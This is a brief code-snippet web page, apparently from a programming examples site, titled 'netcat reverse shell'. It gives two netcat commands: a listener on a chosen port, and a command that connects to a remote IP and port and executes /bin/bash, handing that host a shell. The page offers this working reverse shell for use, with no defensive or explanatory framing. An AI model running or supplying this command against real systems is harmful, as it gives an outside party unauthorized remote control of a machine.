Search
 
SCRIPT & CODE EXAMPLE
 
CODE EXAMPLE FOR SHELL

netcat reverse shell

nc -l -p <port>

nc <ip> <port> –e /bin/bash 
 
PREVIOUS NEXT
Tagged: #netcat #reverse #shell
ADD COMMENT
Topic
Name
6+7 =